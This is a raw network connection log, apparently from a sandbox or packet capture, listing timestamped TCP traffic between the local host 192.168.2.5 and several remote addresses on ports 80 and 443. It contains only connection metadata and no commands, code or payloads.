Sep 1, 2024 06:28:11.721963882 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721975088 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721986055 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.721996069 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722019911 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.722068071 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.722438097 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722501993 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722515106 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722547054 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.722589016 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.722626925 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722640991 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722661018 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722671986 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722692013 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.722707987 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.722748041 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.722857952 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722868919 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722879887 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722889900 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.722934008 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.722944021 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.723073006 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723083973 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723094940 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723103046 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723154068 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.723253012 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723320961 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.723357916 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723368883 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723414898 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.723505974 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723515987 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723526955 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723540068 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723551035 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.723567963 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.723567963 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.723604918 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.724376917 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.724426031 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.724442005 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.724442959 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.724498034 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.724571943 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.724584103 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.724595070 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.724632978 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.724632978 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.724965096 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.724975109 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.724987030 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.724997044 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.725009918 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.725028038 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.725028038 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.725028038 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.725056887 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.725096941 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.725387096 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.725444078 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.725498915 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.731462002 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731520891 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.731617928 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731627941 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731641054 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731652975 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731664896 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731673002 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.731673002 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.731686115 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731698990 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731710911 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.731776953 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.731923103 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731934071 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731944084 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731955051 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731966972 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731973886 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.731981039 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.731992006 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.732003927 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.732003927 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.732004881 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.732050896 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.732050896 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.732218981 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.732230902 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.732240915 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.732321024 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.732419014 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.732429028 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.732522011 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.781408072 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781439066 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781450033 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781487942 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781500101 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781511068 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781511068 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.781526089 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781531096 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.781565905 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.781565905 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.781687975 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781749964 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781768084 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.781821012 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.781850100 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781861067 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781872034 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.781900883 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.782083035 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782094002 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782104969 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782146931 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.782146931 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.782207966 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782218933 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782228947 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782238960 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782344103 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.782500029 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782515049 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782603979 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.782752037 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782764912 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782780886 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782802105 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.782830000 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.782932043 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782943964 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782953978 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782963991 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782975912 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.782984018 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.782988071 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.783010006 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.783063889 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.783066988 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.783108950 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.783139944 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.783150911 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.783160925 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.783217907 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.783358097 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.783368111 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.783380032 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.783390999 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.783405066 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.783498049 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.812060118 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.812119961 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.812180996 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.812207937 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.812251091 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.812757015 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.812769890 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.812782049 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.812788010 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.812802076 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.812808037 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.812818050 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.812830925 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.812832117 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.812841892 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.812856913 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.812869072 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813075066 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813085079 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813095093 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813107967 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813117027 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813118935 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813133955 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813137054 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813148022 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813158035 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813159943 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813170910 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813184023 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813185930 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813205957 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813218117 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813443899 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813497066 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813536882 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813549995 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813560963 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813577890 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813580990 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813585043 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813595057 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813605070 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813616991 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813632965 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813812017 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813822031 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813832998 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813842058 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813852072 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813864946 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813873053 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813877106 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.813900948 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.813920975 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.814101934 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.814115047 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.814127922 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.814137936 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.814165115 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.814181089 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:12.782558918 CEST	49709	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:12.782830954 CEST	49716	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:12.787812948 CEST	80	49716	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:12.787868977 CEST	49716	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:12.787884951 CEST	80	49709	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:12.787940979 CEST	49709	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:12.812720060 CEST	49716	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:12.817775011 CEST	80	49716	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:12.934771061 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:12.934794903 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:12.934807062 CEST	49710	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:12.934813023 CEST	443	49710	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:13.541237116 CEST	80	49716	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:13.541306019 CEST	49716	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:13.651189089 CEST	49716	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:13.651762962 CEST	49718	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:13.659934044 CEST	80	49716	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:13.659985065 CEST	49716	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:13.660064936 CEST	80	49718	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:13.660130978 CEST	49718	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:13.661907911 CEST	49718	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:13.669120073 CEST	80	49718	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:14.410284996 CEST	80	49718	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:14.410388947 CEST	49718	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:14.507797956 CEST	49718	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:14.513175964 CEST	80	49718	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:14.757280111 CEST	80	49718	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:14.757343054 CEST	49718	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:15.231853008 CEST	80	49708	185.215.113.100	192.168.2.5
Sep 1, 2024 06:28:15.233041048 CEST	49708	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:15.681205988 CEST	49718	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:15.681499958 CEST	49721	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:15.687654972 CEST	80	49721	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:15.687674046 CEST	80	49718	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:15.687732935 CEST	49721	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:15.687757015 CEST	49718	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:15.957053900 CEST	49721	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:15.962748051 CEST	80	49721	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:16.460330009 CEST	80	49721	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:16.460396051 CEST	49721	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:16.476480007 CEST	49721	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:16.481328011 CEST	80	49721	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:16.728364944 CEST	80	49721	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:16.728416920 CEST	49721	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:16.843502998 CEST	49721	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:16.844059944 CEST	49730	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:16.848997116 CEST	80	49721	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:16.849051952 CEST	49721	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:16.849250078 CEST	80	49730	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:16.849311113 CEST	49730	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:16.849431038 CEST	49730	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:16.854556084 CEST	80	49730	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:17.395126104 CEST	49708	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:17.594091892 CEST	80	49730	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:17.594156981 CEST	49730	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:17.594856024 CEST	49730	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:17.603941917 CEST	80	49730	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:17.843235016 CEST	80	49730	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:17.846623898 CEST	49730	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:17.897432089 CEST	49732	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:17.902761936 CEST	80	49732	185.215.113.100	192.168.2.5
Sep 1, 2024 06:28:17.902971983 CEST	49732	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:17.903256893 CEST	49732	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:17.908725023 CEST	80	49732	185.215.113.100	192.168.2.5
Sep 1, 2024 06:28:18.003226042 CEST	49730	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:18.003834009 CEST	49734	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:18.008749962 CEST	80	49730	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:18.008800983 CEST	49730	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:18.009264946 CEST	80	49734	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:18.009408951 CEST	49734	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:18.010082960 CEST	49734	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:18.015085936 CEST	80	49734	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:18.644939899 CEST	80	49732	185.215.113.100	192.168.2.5
Sep 1, 2024 06:28:18.645056963 CEST	49732	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:18.647526979 CEST	49732	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:18.652426958 CEST	80	49732	185.215.113.100	192.168.2.5
Sep 1, 2024 06:28:18.689654112 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:18.689692020 CEST	443	49740	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:18.689747095 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:18.689949036 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:18.689965010 CEST	443	49740	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:18.756365061 CEST	80	49734	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:18.756417990 CEST	49734	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:18.757287025 CEST	49734	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:18.764568090 CEST	80	49734	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:18.792783022 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:18.792813063 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:18.792865992 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:18.793114901 CEST	49741	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:18.793127060 CEST	443	49741	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:18.895711899 CEST	80	49732	185.215.113.100	192.168.2.5
Sep 1, 2024 06:28:18.895756006 CEST	49732	80	192.168.2.5	185.215.113.100
Sep 1, 2024 06:28:19.015863895 CEST	80	49734	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:19.015939951 CEST	49734	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:19.102796078 CEST	49742	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:19.102833033 CEST	443	49742	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:19.102894068 CEST	49742	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:19.104368925 CEST	49742	443	192.168.2.5	184.28.90.27
Sep 1, 2024 06:28:19.104382992 CEST	443	49742	184.28.90.27	192.168.2.5
Sep 1, 2024 06:28:19.130496979 CEST	49734	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:19.131016970 CEST	49743	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:19.135700941 CEST	80	49734	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:19.135745049 CEST	49734	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:19.135953903 CEST	80	49743	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:19.136003971 CEST	49743	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:19.153245926 CEST	49743	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:19.157969952 CEST	80	49743	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:19.345160007 CEST	443	49740	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.345407009 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.345428944 CEST	443	49740	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.346478939 CEST	443	49740	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.346519947 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.347654104 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.347712994 CEST	443	49740	13.107.246.60	192.168.2.5
Sep 1, 2024 06:28:19.347965956 CEST	49740	443	192.168.2.5	13.107.246.60
Sep 1, 2024 06:28:19.347973108 CEST	443	49740	13.107.246.60	192.168.2.5
